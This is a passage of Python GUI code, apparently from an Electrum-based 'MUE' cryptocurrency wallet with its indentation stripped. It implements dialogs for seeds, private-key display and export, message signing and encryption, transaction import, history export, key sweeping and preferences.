vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
# def on_dynfee(x):
# self.config.set_key('dynamic_fees', x == Qt.Checked)
# self.fee_slider.update()
# dynfee_cb = QCheckBox(_('Use dynamic fees'))
# dynfee_cb.setChecked(self.config.is_dynfee())
# dynfee_cb.setToolTip(_("Use fees recommended by the server."))
# fee_widgets.append((dynfee_cb, None))
# dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possiblity, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mMUE/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['MUE', 'mMUE', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1MUE=1000mMUE.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'MUE':
self.decimal_point = 8
elif unit_result == 'mMUE':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
